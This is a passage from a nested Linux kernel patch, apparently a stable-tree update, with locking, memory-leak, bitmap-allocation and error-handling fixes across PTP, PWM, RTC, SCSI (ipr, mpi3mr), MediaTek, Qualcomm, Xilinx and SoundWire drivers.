++	if (mutex_lock_interruptible(&vclock->lock))
++		return -EINTR;
+ 	ns = timecounter_cyc2time(&vclock->tc, ktime_to_ns(xtstamp->device));
+-	spin_unlock_irqrestore(&vclock->lock, flags);
++	mutex_unlock(&vclock->lock);
+ 
+ 	xtstamp->device = ns_to_ktime(ns);
+ 
+@@ -205,7 +205,7 @@ struct ptp_vclock *ptp_vclock_register(struct ptp_clock *pclock)
+ 
+ 	INIT_HLIST_NODE(&vclock->vclock_hash_node);
+ 
+-	spin_lock_init(&vclock->lock);
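++	/* A mutex rather than a spinlock: reading the parent clock can sleep */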
++	mutex_init(&vclock->lock);
+ 
+ 	vclock->clock = ptp_clock_register(&vclock->info, &pclock->dev);
+ 	if (IS_ERR_OR_NULL(vclock->clock)) {
+@@ -269,7 +269,6 @@ ktime_t ptp_convert_timestamp(const ktime_t *hwtstamp, int vclock_index)
+ {
+ 	unsigned int hash = vclock_index % HASH_SIZE(vclock_hash);
+ 	struct ptp_vclock *vclock;
+-	unsigned long flags;
+ 	u64 ns;
+ 	u64 vclock_ns = 0;
+ 
+@@ -281,9 +280,10 @@ ktime_t ptp_convert_timestamp(const ktime_t *hwtstamp, int vclock_index)
+ 		if (vclock->clock->index != vclock_index)
+ 			continue;
+ 
+-		spin_lock_irqsave(&vclock->lock, flags);
++		if (mutex_lock_interruptible(&vclock->lock))
++			break;
+ 		vclock_ns = timecounter_cyc2time(&vclock->tc, ns);
+-		spin_unlock_irqrestore(&vclock->lock, flags);
++		mutex_unlock(&vclock->lock);
+ 		break;
+ 	}
+ 
+diff --git a/drivers/pwm/pwm-sifive.c b/drivers/pwm/pwm-sifive.c
+index 62b6acc6373db..393a4b97fc19e 100644
+--- a/drivers/pwm/pwm-sifive.c
++++ b/drivers/pwm/pwm-sifive.c
+@@ -161,7 +161,13 @@ static int pwm_sifive_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 
+ 	mutex_lock(&ddata->lock);
+ 	if (state->period != ddata->approx_period) {
+-		if (ddata->user_count != 1) {
++		/*
++		 * Don't let a 2nd user change the period underneath the 1st user.
++		 * However, if ddata->approx_period == 0 this is the first time we set
++		 * any period, so let whoever gets here first set the period so other
++		 * users who agree on the period won't fail.
++		 */
++		if (ddata->user_count != 1 && ddata->approx_period) {
+ 			mutex_unlock(&ddata->lock);
+ 			return -EBUSY;
+ 		}
+diff --git a/drivers/pwm/pwm-stm32-lp.c b/drivers/pwm/pwm-stm32-lp.c
+index 514ff58a4471d..f315fa106be87 100644
+--- a/drivers/pwm/pwm-stm32-lp.c
++++ b/drivers/pwm/pwm-stm32-lp.c
+@@ -127,7 +127,7 @@ static int stm32_pwm_lp_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 
+ 	/* ensure CMP & ARR registers are properly written */
+ 	ret = regmap_read_poll_timeout(priv->regmap, STM32_LPTIM_ISR, val,
+-				       (val & STM32_LPTIM_CMPOK_ARROK),
++				       (val & STM32_LPTIM_CMPOK_ARROK) == STM32_LPTIM_CMPOK_ARROK,
+ 				       100, 1000);
+ 	if (ret) {
+ 		dev_err(priv->chip.dev, "ARR/CMP registers write issue\n");
+diff --git a/drivers/rtc/interface.c b/drivers/rtc/interface.c
+index 7c30cb3c764d8..499d89150afc9 100644
+--- a/drivers/rtc/interface.c
++++ b/drivers/rtc/interface.c
+@@ -392,7 +392,7 @@ int rtc_read_alarm(struct rtc_device *rtc, struct rtc_wkalrm *alarm)
+ 		return err;
+ 	if (!rtc->ops) {
+ 		err = -ENODEV;
+-	} else if (!test_bit(RTC_FEATURE_ALARM, rtc->features) || !rtc->ops->read_alarm) {
++	} else if (!test_bit(RTC_FEATURE_ALARM, rtc->features)) {
+ 		err = -EINVAL;
+ 	} else {
+ 		memset(alarm, 0, sizeof(struct rtc_wkalrm));
+diff --git a/drivers/rtc/rtc-sun6i.c b/drivers/rtc/rtc-sun6i.c
+index ed5516089e9a0..7038f47d77ff4 100644
+--- a/drivers/rtc/rtc-sun6i.c
++++ b/drivers/rtc/rtc-sun6i.c
+@@ -136,7 +136,6 @@ struct sun6i_rtc_clk_data {
+ 	unsigned int fixed_prescaler : 16;
+ 	unsigned int has_prescaler : 1;
+ 	unsigned int has_out_clk : 1;
+-	unsigned int export_iosc : 1;
+ 	unsigned int has_losc_en : 1;
+ 	unsigned int has_auto_swt : 1;
+ };
+@@ -271,10 +270,8 @@ static void __init sun6i_rtc_clk_init(struct device_node *node,
+ 	/* Yes, I know, this is ugly. */
+ 	sun6i_rtc = rtc;
+ 
+-	/* Only read IOSC name from device tree if it is exported */
+-	if (rtc->data->export_iosc)
+-		of_property_read_string_index(node, "clock-output-names", 2,
+-					      &iosc_name);
++	of_property_read_string_index(node, "clock-output-names", 2,
++				      &iosc_name);
+ 
+ 	rtc->int_osc = clk_hw_register_fixed_rate_with_accuracy(NULL,
+ 								iosc_name,
+@@ -315,13 +312,10 @@ static void __init sun6i_rtc_clk_init(struct device_node *node,
+ 		goto err_register;
+ 	}
+ 
+-	clk_data->num = 2;
++	clk_data->num = 3;
+ 	clk_data->hws[0] = &rtc->hw;
+ 	clk_data->hws[1] = __clk_get_hw(rtc->ext_losc);
+-	if (rtc->data->export_iosc) {
+-		clk_data->hws[2] = rtc->int_osc;
+-		clk_data->num = 3;
+-	}
++	clk_data->hws[2] = rtc->int_osc;
+ 	of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	return;
+ 
+@@ -361,7 +355,6 @@ static const struct sun6i_rtc_clk_data sun8i_h3_rtc_data = {
+ 	.fixed_prescaler = 32,
+ 	.has_prescaler = 1,
+ 	.has_out_clk = 1,
+-	.export_iosc = 1,
+ };
+ 
+ static void __init sun8i_h3_rtc_clk_init(struct device_node *node)
+@@ -379,7 +372,6 @@ static const struct sun6i_rtc_clk_data sun50i_h6_rtc_data = {
+ 	.fixed_prescaler = 32,
+ 	.has_prescaler = 1,
+ 	.has_out_clk = 1,
+-	.export_iosc = 1,
+ 	.has_losc_en = 1,
+ 	.has_auto_swt = 1,
+ };
+diff --git a/drivers/scsi/ipr.c b/drivers/scsi/ipr.c
+index 2022ffb450417..8c062afb2918d 100644
+--- a/drivers/scsi/ipr.c
++++ b/drivers/scsi/ipr.c
+@@ -1516,23 +1516,22 @@ static void ipr_process_ccn(struct ipr_cmnd *ipr_cmd)
+ }
+ 
+ /**
+- * strip_and_pad_whitespace - Strip and pad trailing whitespace.
+- * @i:		index into buffer
+- * @buf:		string to modify
++ * strip_whitespace - Strip trailing whitespace.
++ * @i:		size of buffer
++ * @buf:	string to modify
+  *
+- * This function will strip all trailing whitespace, pad the end
+- * of the string with a single space, and NULL terminate the string.
++ * This function will strip all trailing whitespace and
++ * NUL terminate the string.
+  *
+- * Return value:
+- * 	new length of string
+  **/
+-static int strip_and_pad_whitespace(int i, char *buf)
++static void strip_whitespace(int i, char *buf)
+ {
++	if (i < 1)
++		return;
++	i--;
+ 	while (i && buf[i] == ' ')
+ 		i--;
+-	buf[i+1] = ' ';
+-	buf[i+2] = '\0';
+-	return i + 2;
++	buf[i+1] = '\0';
+ }
+ 
+ /**
+@@ -1547,19 +1546,21 @@ static int strip_and_pad_whitespace(int i, char *buf)
+ static void ipr_log_vpd_compact(char *prefix, struct ipr_hostrcb *hostrcb,
+ 				struct ipr_vpd *vpd)
+ {
+-	char buffer[IPR_VENDOR_ID_LEN + IPR_PROD_ID_LEN + IPR_SERIAL_NUM_LEN + 3];
+-	int i = 0;
++	char vendor_id[IPR_VENDOR_ID_LEN + 1];
++	char product_id[IPR_PROD_ID_LEN + 1];
++	char sn[IPR_SERIAL_NUM_LEN + 1];
+ 
+-	memcpy(buffer, vpd->vpids.vendor_id, IPR_VENDOR_ID_LEN);
+-	i = strip_and_pad_whitespace(IPR_VENDOR_ID_LEN - 1, buffer);
++	memcpy(vendor_id, vpd->vpids.vendor_id, IPR_VENDOR_ID_LEN);
++	strip_whitespace(IPR_VENDOR_ID_LEN, vendor_id);
+ 
+-	memcpy(&buffer[i], vpd->vpids.product_id, IPR_PROD_ID_LEN);
+-	i = strip_and_pad_whitespace(i + IPR_PROD_ID_LEN - 1, buffer);
++	memcpy(product_id, vpd->vpids.product_id, IPR_PROD_ID_LEN);
++	strip_whitespace(IPR_PROD_ID_LEN, product_id);
+ 
+-	memcpy(&buffer[i], vpd->sn, IPR_SERIAL_NUM_LEN);
+-	buffer[IPR_SERIAL_NUM_LEN + i] = '\0';
++	memcpy(sn, vpd->sn, IPR_SERIAL_NUM_LEN);
++	strip_whitespace(IPR_SERIAL_NUM_LEN, sn);
+ 
+-	ipr_hcam_err(hostrcb, "%s VPID/SN: %s\n", prefix, buffer);
++	ipr_hcam_err(hostrcb, "%s VPID/SN: %s %s %s\n", prefix,
++		     vendor_id, product_id, sn);
+ }
+ 
+ /**
+diff --git a/drivers/scsi/mpi3mr/mpi3mr.h b/drivers/scsi/mpi3mr/mpi3mr.h
+index def4c5e15cd89..8a438f248a820 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr.h
++++ b/drivers/scsi/mpi3mr/mpi3mr.h
+@@ -955,19 +955,16 @@ struct scmd_priv {
+  * @chain_buf_count: Chain buffer count
+  * @chain_buf_pool: Chain buffer pool
+  * @chain_sgl_list: Chain SGL list
+- * @chain_bitmap_sz: Chain buffer allocator bitmap size
+  * @chain_bitmap: Chain buffer allocator bitmap
+  * @chain_buf_lock: Chain buffer list lock
+  * @bsg_cmds: Command tracker for BSG command
+  * @host_tm_cmds: Command tracker for task management commands
+  * @dev_rmhs_cmds: Command tracker for device removal commands
+  * @evtack_cmds: Command tracker for event ack commands
+- * @devrem_bitmap_sz: Device removal bitmap size
+  * @devrem_bitmap: Device removal bitmap
+- * @dev_handle_bitmap_sz: Device handle bitmap size
++ * @dev_handle_bitmap_bits: Number of bits in device handle bitmap
+  * @removepend_bitmap: Remove pending bitmap
+  * @delayed_rmhs_list: Delayed device removal list
+- * @evtack_cmds_bitmap_sz: Event Ack bitmap size
+  * @evtack_cmds_bitmap: Event Ack bitmap
+  * @delayed_evtack_cmds_list: Delayed event acknowledgment list
+  * @ts_update_counter: Timestamp update counter
+@@ -1128,7 +1125,6 @@ struct mpi3mr_ioc {
+ 	u32 chain_buf_count;
+ 	struct dma_pool *chain_buf_pool;
+ 	struct chain_element *chain_sgl_list;
+-	u16  chain_bitmap_sz;
+ 	void *chain_bitmap;
+ 	spinlock_t chain_buf_lock;
+ 
+@@ -1136,12 +1132,10 @@ struct mpi3mr_ioc {
+ 	struct mpi3mr_drv_cmd host_tm_cmds;
+ 	struct mpi3mr_drv_cmd dev_rmhs_cmds[MPI3MR_NUM_DEVRMCMD];
+ 	struct mpi3mr_drv_cmd evtack_cmds[MPI3MR_NUM_EVTACKCMD];
+-	u16 devrem_bitmap_sz;
+ 	void *devrem_bitmap;
+-	u16 dev_handle_bitmap_sz;
++	u16 dev_handle_bitmap_bits;
+ 	void *removepend_bitmap;
+ 	struct list_head delayed_rmhs_list;
+-	u16 evtack_cmds_bitmap_sz;
+ 	void *evtack_cmds_bitmap;
+ 	struct list_head delayed_evtack_cmds_list;
+ 
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_fw.c b/drivers/scsi/mpi3mr/mpi3mr_fw.c
+index 286a44506578b..758f7ca9e0ee8 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_fw.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_fw.c
+@@ -1128,7 +1128,6 @@ static int mpi3mr_issue_and_process_mur(struct mpi3mr_ioc *mrioc,
+ static int
+ mpi3mr_revalidate_factsdata(struct mpi3mr_ioc *mrioc)
+ {
+-	u16 dev_handle_bitmap_sz;
+ 	void *removepend_bitmap;
+ 
+ 	if (mrioc->facts.reply_sz > mrioc->reply_sz) {
+@@ -1160,25 +1159,23 @@ mpi3mr_revalidate_factsdata(struct mpi3mr_ioc *mrioc)
+ 		    "\tcontroller while sas transport support is enabled at the\n"
+ 		    "\tdriver, please reboot the system or reload the driver\n");
+ 
+-	dev_handle_bitmap_sz = mrioc->facts.max_devhandle / 8;
+-	if (mrioc->facts.max_devhandle % 8)
+-		dev_handle_bitmap_sz++;
+-	if (dev_handle_bitmap_sz > mrioc->dev_handle_bitmap_sz) {
+-		removepend_bitmap = krealloc(mrioc->removepend_bitmap,
+-		    dev_handle_bitmap_sz, GFP_KERNEL);
++	if (mrioc->facts.max_devhandle > mrioc->dev_handle_bitmap_bits) {
++		removepend_bitmap = bitmap_zalloc(mrioc->facts.max_devhandle,
++						  GFP_KERNEL);
+ 		if (!removepend_bitmap) {
+ 			ioc_err(mrioc,
+-			    "failed to increase removepend_bitmap sz from: %d to %d\n",
+-			    mrioc->dev_handle_bitmap_sz, dev_handle_bitmap_sz);
++				"failed to increase removepend_bitmap bits from %d to %d\n",
++				mrioc->dev_handle_bitmap_bits,
++				mrioc->facts.max_devhandle);
+ 			return -EPERM;
+ 		}
+-		memset(removepend_bitmap + mrioc->dev_handle_bitmap_sz, 0,
+-		    dev_handle_bitmap_sz - mrioc->dev_handle_bitmap_sz);
++		bitmap_free(mrioc->removepend_bitmap);
+ 		mrioc->removepend_bitmap = removepend_bitmap;
+ 		ioc_info(mrioc,
+-		    "increased dev_handle_bitmap_sz from %d to %d\n",
+-		    mrioc->dev_handle_bitmap_sz, dev_handle_bitmap_sz);
+-		mrioc->dev_handle_bitmap_sz = dev_handle_bitmap_sz;
++			 "increased bits of dev_handle_bitmap from %d to %d\n",
++			 mrioc->dev_handle_bitmap_bits,
++			 mrioc->facts.max_devhandle);
++		mrioc->dev_handle_bitmap_bits = mrioc->facts.max_devhandle;
+ 	}
+ 
+ 	return 0;
+@@ -2957,27 +2954,18 @@ static int mpi3mr_alloc_reply_sense_bufs(struct mpi3mr_ioc *mrioc)
+ 	if (!mrioc->pel_abort_cmd.reply)
+ 		goto out_failed;
+ 
+-	mrioc->dev_handle_bitmap_sz = mrioc->facts.max_devhandle / 8;
+-	if (mrioc->facts.max_devhandle % 8)
+-		mrioc->dev_handle_bitmap_sz++;
+-	mrioc->removepend_bitmap = kzalloc(mrioc->dev_handle_bitmap_sz,
+-	    GFP_KERNEL);
++	mrioc->dev_handle_bitmap_bits = mrioc->facts.max_devhandle;
++	mrioc->removepend_bitmap = bitmap_zalloc(mrioc->dev_handle_bitmap_bits,
++						 GFP_KERNEL);
+ 	if (!mrioc->removepend_bitmap)
+ 		goto out_failed;
+ 
+-	mrioc->devrem_bitmap_sz = MPI3MR_NUM_DEVRMCMD / 8;
+-	if (MPI3MR_NUM_DEVRMCMD % 8)
+-		mrioc->devrem_bitmap_sz++;
+-	mrioc->devrem_bitmap = kzalloc(mrioc->devrem_bitmap_sz,
+-	    GFP_KERNEL);
++	mrioc->devrem_bitmap = bitmap_zalloc(MPI3MR_NUM_DEVRMCMD, GFP_KERNEL);
+ 	if (!mrioc->devrem_bitmap)
+ 		goto out_failed;
+ 
+-	mrioc->evtack_cmds_bitmap_sz = MPI3MR_NUM_EVTACKCMD / 8;
+-	if (MPI3MR_NUM_EVTACKCMD % 8)
+-		mrioc->evtack_cmds_bitmap_sz++;
+-	mrioc->evtack_cmds_bitmap = kzalloc(mrioc->evtack_cmds_bitmap_sz,
+-	    GFP_KERNEL);
++	mrioc->evtack_cmds_bitmap = bitmap_zalloc(MPI3MR_NUM_EVTACKCMD,
++						  GFP_KERNEL);
+ 	if (!mrioc->evtack_cmds_bitmap)
+ 		goto out_failed;
+ 
+@@ -3415,10 +3403,7 @@ static int mpi3mr_alloc_chain_bufs(struct mpi3mr_ioc *mrioc)
+ 		if (!mrioc->chain_sgl_list[i].addr)
+ 			goto out_failed;
+ 	}
+-	mrioc->chain_bitmap_sz = num_chains / 8;
+-	if (num_chains % 8)
+-		mrioc->chain_bitmap_sz++;
+-	mrioc->chain_bitmap = kzalloc(mrioc->chain_bitmap_sz, GFP_KERNEL);
++	mrioc->chain_bitmap = bitmap_zalloc(num_chains, GFP_KERNEL);
+ 	if (!mrioc->chain_bitmap)
+ 		goto out_failed;
+ 	return retval;
+@@ -4189,10 +4174,11 @@ void mpi3mr_memset_buffers(struct mpi3mr_ioc *mrioc)
+ 		for (i = 0; i < MPI3MR_NUM_EVTACKCMD; i++)
+ 			memset(mrioc->evtack_cmds[i].reply, 0,
+ 			    sizeof(*mrioc->evtack_cmds[i].reply));
+-		memset(mrioc->removepend_bitmap, 0, mrioc->dev_handle_bitmap_sz);
+-		memset(mrioc->devrem_bitmap, 0, mrioc->devrem_bitmap_sz);
+-		memset(mrioc->evtack_cmds_bitmap, 0,
+-		    mrioc->evtack_cmds_bitmap_sz);
++		bitmap_clear(mrioc->removepend_bitmap, 0,
++			     mrioc->dev_handle_bitmap_bits);
++		bitmap_clear(mrioc->devrem_bitmap, 0, MPI3MR_NUM_DEVRMCMD);
++		bitmap_clear(mrioc->evtack_cmds_bitmap, 0,
++			     MPI3MR_NUM_EVTACKCMD);
+ 	}
+ 
+ 	for (i = 0; i < mrioc->num_queues; i++) {
+@@ -4318,16 +4304,16 @@ void mpi3mr_free_mem(struct mpi3mr_ioc *mrioc)
+ 		mrioc->evtack_cmds[i].reply = NULL;
+ 	}
+ 
+-	kfree(mrioc->removepend_bitmap);
++	bitmap_free(mrioc->removepend_bitmap);
+ 	mrioc->removepend_bitmap = NULL;
+ 
+-	kfree(mrioc->devrem_bitmap);
++	bitmap_free(mrioc->devrem_bitmap);
+ 	mrioc->devrem_bitmap = NULL;
+ 
+-	kfree(mrioc->evtack_cmds_bitmap);
++	bitmap_free(mrioc->evtack_cmds_bitmap);
+ 	mrioc->evtack_cmds_bitmap = NULL;
+ 
+-	kfree(mrioc->chain_bitmap);
++	bitmap_free(mrioc->chain_bitmap);
+ 	mrioc->chain_bitmap = NULL;
+ 
+ 	kfree(mrioc->transport_cmds.reply);
+@@ -4886,9 +4872,10 @@ int mpi3mr_soft_reset_handler(struct mpi3mr_ioc *mrioc,
+ 
+ 	mpi3mr_flush_delayed_cmd_lists(mrioc);
+ 	mpi3mr_flush_drv_cmds(mrioc);
+-	memset(mrioc->devrem_bitmap, 0, mrioc->devrem_bitmap_sz);
+-	memset(mrioc->removepend_bitmap, 0, mrioc->dev_handle_bitmap_sz);
+-	memset(mrioc->evtack_cmds_bitmap, 0, mrioc->evtack_cmds_bitmap_sz);
++	bitmap_clear(mrioc->devrem_bitmap, 0, MPI3MR_NUM_DEVRMCMD);
++	bitmap_clear(mrioc->removepend_bitmap, 0,
++		     mrioc->dev_handle_bitmap_bits);
++	bitmap_clear(mrioc->evtack_cmds_bitmap, 0, MPI3MR_NUM_EVTACKCMD);
+ 	mpi3mr_flush_host_io(mrioc);
+ 	mpi3mr_cleanup_fwevt_list(mrioc);
+ 	mpi3mr_invalidate_devhandles(mrioc);
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_transport.c b/drivers/scsi/mpi3mr/mpi3mr_transport.c
+index 3fc897336b5e0..3b61815979dab 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_transport.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_transport.c
+@@ -1280,7 +1280,7 @@ void mpi3mr_sas_host_add(struct mpi3mr_ioc *mrioc)
+ 
+ 	if (mrioc->sas_hba.enclosure_handle) {
+ 		if (!(mpi3mr_cfg_get_enclosure_pg0(mrioc, &ioc_status,
+-		    &encl_pg0, sizeof(dev_pg0),
++		    &encl_pg0, sizeof(encl_pg0),
+ 		    MPI3_ENCLOS_PGAD_FORM_HANDLE,
+ 		    mrioc->sas_hba.enclosure_handle)) &&
+ 		    (ioc_status == MPI3_IOCSTATUS_SUCCESS))
+diff --git a/drivers/soc/mediatek/mt8186-pm-domains.h b/drivers/soc/mediatek/mt8186-pm-domains.h
+index 108af61854a38..fce86f79c5055 100644
+--- a/drivers/soc/mediatek/mt8186-pm-domains.h
++++ b/drivers/soc/mediatek/mt8186-pm-domains.h
+@@ -304,7 +304,6 @@ static const struct scpsys_domain_data scpsys_domain_data_mt8186[] = {
+ 		.ctl_offs = 0x9FC,
+ 		.pwr_sta_offs = 0x16C,
+ 		.pwr_sta2nd_offs = 0x170,
+-		.caps = MTK_SCPD_KEEP_DEFAULT_OFF,
+ 	},
+ 	[MT8186_POWER_DOMAIN_ADSP_INFRA] = {
+ 		.name = "adsp_infra",
+@@ -312,7 +311,6 @@ static const struct scpsys_domain_data scpsys_domain_data_mt8186[] = {
+ 		.ctl_offs = 0x9F8,
+ 		.pwr_sta_offs = 0x16C,
+ 		.pwr_sta2nd_offs = 0x170,
+-		.caps = MTK_SCPD_KEEP_DEFAULT_OFF,
+ 	},
+ 	[MT8186_POWER_DOMAIN_ADSP_TOP] = {
+ 		.name = "adsp_top",
+@@ -332,7 +330,7 @@ static const struct scpsys_domain_data scpsys_domain_data_mt8186[] = {
+ 				MT8186_TOP_AXI_PROT_EN_3_CLR,
+ 				MT8186_TOP_AXI_PROT_EN_3_STA),
+ 		},
+-		.caps = MTK_SCPD_SRAM_ISO | MTK_SCPD_KEEP_DEFAULT_OFF | MTK_SCPD_ACTIVE_WAKEUP,
++		.caps = MTK_SCPD_SRAM_ISO | MTK_SCPD_ACTIVE_WAKEUP,
+ 	},
+ };
+ 
+diff --git a/drivers/soc/mediatek/mtk-svs.c b/drivers/soc/mediatek/mtk-svs.c
+index 0469c9dfeb04e..00526fd37d7b8 100644
+--- a/drivers/soc/mediatek/mtk-svs.c
++++ b/drivers/soc/mediatek/mtk-svs.c
+@@ -1324,7 +1324,7 @@ static int svs_init01(struct svs_platform *svsp)
+ 				svsb->pm_runtime_enabled_count++;
+ 			}
+ 
+-			ret = pm_runtime_get_sync(svsb->opp_dev);
++			ret = pm_runtime_resume_and_get(svsb->opp_dev);
+ 			if (ret < 0) {
+ 				dev_err(svsb->dev, "mtcmos on fail: %d\n", ret);
+ 				goto svs_init01_resume_cpuidle;
+@@ -1461,6 +1461,7 @@ static int svs_init02(struct svs_platform *svsp)
+ {
+ 	struct svs_bank *svsb;
+ 	unsigned long flags, time_left;
++	int ret;
+ 	u32 idx;
+ 
+ 	for (idx = 0; idx < svsp->bank_max; idx++) {
+@@ -1479,7 +1480,8 @@ static int svs_init02(struct svs_platform *svsp)
+ 							msecs_to_jiffies(5000));
+ 		if (!time_left) {
+ 			dev_err(svsb->dev, "init02 completion timeout\n");
+-			return -EBUSY;
++			ret = -EBUSY;
++			goto out_of_init02;
+ 		}
+ 	}
+ 
+@@ -1497,12 +1499,30 @@ static int svs_init02(struct svs_platform *svsp)
+ 		if (svsb->type == SVSB_HIGH || svsb->type == SVSB_LOW) {
+ 			if (svs_sync_bank_volts_from_opp(svsb)) {
+ 				dev_err(svsb->dev, "sync volt fail\n");
+-				return -EPERM;
++				ret = -EPERM;
++				goto out_of_init02;
+ 			}
+ 		}
+ 	}
+ 
+ 	return 0;
++
++out_of_init02:
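++	/* Roll back: disable each bank and fall back to default OPP voltages */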
++	for (idx = 0; idx < svsp->bank_max; idx++) {
++		svsb = &svsp->banks[idx];
++
++		spin_lock_irqsave(&svs_lock, flags);
++		svsp->pbank = svsb;
++		svs_switch_bank(svsp);
++		svs_writel_relaxed(svsp, SVSB_PTPEN_OFF, SVSEN);
++		svs_writel_relaxed(svsp, SVSB_INTSTS_VAL_CLEAN, INTSTS);
++		spin_unlock_irqrestore(&svs_lock, flags);
++
++		svsb->phase = SVSB_PHASE_ERROR;
++		svs_adjust_pm_opp_volts(svsb);
++	}
++
++	return ret;
+ }
+ 
+ static void svs_mon_mode(struct svs_platform *svsp)
+@@ -1594,12 +1614,16 @@ static int svs_resume(struct device *dev)
+ 
+ 	ret = svs_init02(svsp);
+ 	if (ret)
+-		goto out_of_resume;
++		goto svs_resume_reset_assert;
+ 
+ 	svs_mon_mode(svsp);
+ 
+ 	return 0;
+ 
++svs_resume_reset_assert:
++	dev_err(svsp->dev, "assert reset: %d\n",
++		reset_control_assert(svsp->rst));
++
+ out_of_resume:
+ 	clk_disable_unprepare(svsp->main_clk);
+ 	return ret;
+@@ -2385,14 +2409,6 @@ static int svs_probe(struct platform_device *pdev)
+ 		goto svs_probe_free_resource;
+ 	}
+ 
+-	ret = devm_request_threaded_irq(svsp->dev, svsp_irq, NULL, svs_isr,
+-					IRQF_ONESHOT, svsp->name, svsp);
+-	if (ret) {
+-		dev_err(svsp->dev, "register irq(%d) failed: %d\n",
+-			svsp_irq, ret);
+-		goto svs_probe_free_resource;
+-	}
+-
+ 	svsp->main_clk = devm_clk_get(svsp->dev, "main");
+ 	if (IS_ERR(svsp->main_clk)) {
+ 		dev_err(svsp->dev, "failed to get clock: %ld\n",
+@@ -2414,6 +2430,14 @@ static int svs_probe(struct platform_device *pdev)
+ 		goto svs_probe_clk_disable;
+ 	}
+ 
++	ret = devm_request_threaded_irq(svsp->dev, svsp_irq, NULL, svs_isr,
++					IRQF_ONESHOT, svsp->name, svsp);
++	if (ret) {
++		dev_err(svsp->dev, "register irq(%d) failed: %d\n",
++			svsp_irq, ret);
++		goto svs_probe_iounmap;
++	}
++
+ 	ret = svs_start(svsp);
+ 	if (ret) {
+ 		dev_err(svsp->dev, "svs start fail: %d\n", ret);
+diff --git a/drivers/soc/qcom/qcom_stats.c b/drivers/soc/qcom/qcom_stats.c
+index 6228af057120b..c207bb96c523a 100644
+--- a/drivers/soc/qcom/qcom_stats.c
++++ b/drivers/soc/qcom/qcom_stats.c
+@@ -92,7 +92,7 @@ static int qcom_subsystem_sleep_stats_show(struct seq_file *s, void *unused)
+ 	/* Items are allocated lazily, so lookup pointer each time */
+ 	stat = qcom_smem_get(subsystem->pid, subsystem->smem_item, NULL);
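++	/* A missing item just means the subsystem has not booted yet */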
+ 	if (IS_ERR(stat))
+-		return -EIO;
++		return 0;
+ 
+ 	qcom_print_stats(s, stat);
+ 
+@@ -170,20 +170,14 @@ static void qcom_create_soc_sleep_stat_files(struct dentry *root, void __iomem *
+ static void qcom_create_subsystem_stat_files(struct dentry *root,
+ 					     const struct stats_config *config)
+ {
+-	const struct sleep_stats *stat;
+ 	int i;
+ 
+ 	if (!config->subsystem_stats_in_smem)
+ 		return;
+ 
+-	for (i = 0; i < ARRAY_SIZE(subsystems); i++) {
+-		stat = qcom_smem_get(subsystems[i].pid, subsystems[i].smem_item, NULL);
+-		if (IS_ERR(stat))
+-			continue;
+-
++	for (i = 0; i < ARRAY_SIZE(subsystems); i++)
+ 		debugfs_create_file(subsystems[i].name, 0400, root, (void *)&subsystems[i],
+ 				    &qcom_subsystem_sleep_stats_fops);
+-	}
+ }
+ 
+ static int qcom_stats_probe(struct platform_device *pdev)
+diff --git a/drivers/soc/qcom/socinfo.c b/drivers/soc/qcom/socinfo.c
+index ebcbf9b9c18bc..7ce28be9f435e 100644
+--- a/drivers/soc/qcom/socinfo.c
++++ b/drivers/soc/qcom/socinfo.c
+@@ -250,8 +250,6 @@ static const struct soc_id soc_id[] = {
+ 	{ qcom_board_id(MSM8926) },
+ 	{ qcom_board_id(MSM8326) },
+ 	{ qcom_board_id(MSM8916) },
+-	{ qcom_board_id(MSM8956) },
+-	{ qcom_board_id(MSM8976) },
+ 	{ qcom_board_id(MSM8994) },
+ 	{ qcom_board_id_named(APQ8074PRO_AA, "APQ8074PRO-AA") },
+ 	{ qcom_board_id_named(APQ8074PRO_AB, "APQ8074PRO-AB") },
+@@ -283,6 +281,8 @@ static const struct soc_id soc_id[] = {
+ 	{ qcom_board_id(MSM8616) },
+ 	{ qcom_board_id(MSM8992) },
+ 	{ qcom_board_id(APQ8094) },
++	{ qcom_board_id(MSM8956) },
++	{ qcom_board_id(MSM8976) },
+ 	{ qcom_board_id(MDM9607) },
+ 	{ qcom_board_id(APQ8096) },
+ 	{ qcom_board_id(MSM8998) },
+@@ -341,7 +341,6 @@ static const struct soc_id soc_id[] = {
+ 	{ qcom_board_id(IPQ6005) },
+ 	{ qcom_board_id(QRB5165) },
+ 	{ qcom_board_id(SM8450) },
+-	{ qcom_board_id(SM8550) },
+ 	{ qcom_board_id(SM7225) },
+ 	{ qcom_board_id(SA8295P) },
+ 	{ qcom_board_id(SA8540P) },
+@@ -352,6 +351,7 @@ static const struct soc_id soc_id[] = {
+ 	{ qcom_board_id(SC7280) },
+ 	{ qcom_board_id(SC7180P) },
+ 	{ qcom_board_id(SM6375) },
++	{ qcom_board_id(SM8550) },
+ 	{ qcom_board_id(QRU1000) },
+ 	{ qcom_board_id(QDU1000) },
+ 	{ qcom_board_id(QDU1010) },
+diff --git a/drivers/soc/xilinx/xlnx_event_manager.c b/drivers/soc/xilinx/xlnx_event_manager.c
+index 2de082765befa..c76381899ef49 100644
+--- a/drivers/soc/xilinx/xlnx_event_manager.c
++++ b/drivers/soc/xilinx/xlnx_event_manager.c
+@@ -116,8 +116,10 @@ static int xlnx_add_cb_for_notify_event(const u32 node_id, const u32 event, cons
+ 		INIT_LIST_HEAD(&eve_data->cb_list_head);
+ 
+ 		cb_data = kmalloc(sizeof(*cb_data), GFP_KERNEL);
+-		if (!cb_data)
++		if (!cb_data) {
++			kfree(eve_data);
+ 			return -ENOMEM;
++		}
+ 		cb_data->eve_cb = cb_fun;
+ 		cb_data->agent_data = data;
+ 
+diff --git a/drivers/soundwire/bus_type.c b/drivers/soundwire/bus_type.c
+index 04b3529f89293..963498db0fd22 100644
+--- a/drivers/soundwire/bus_type.c
++++ b/drivers/soundwire/bus_type.c
+@@ -105,20 +105,19 @@ static int sdw_drv_probe(struct device *dev)
+ 	if (ret)
+ 		return ret;
+ 
+-	mutex_lock(&slave->sdw_dev_lock);
+-
+ 	ret = drv->probe(slave, id);
+ 	if (ret) {
+ 		name = drv->name;
+ 		if (!name)
+ 			name = drv->driver.name;
+-		mutex_unlock(&slave->sdw_dev_lock);
+ 
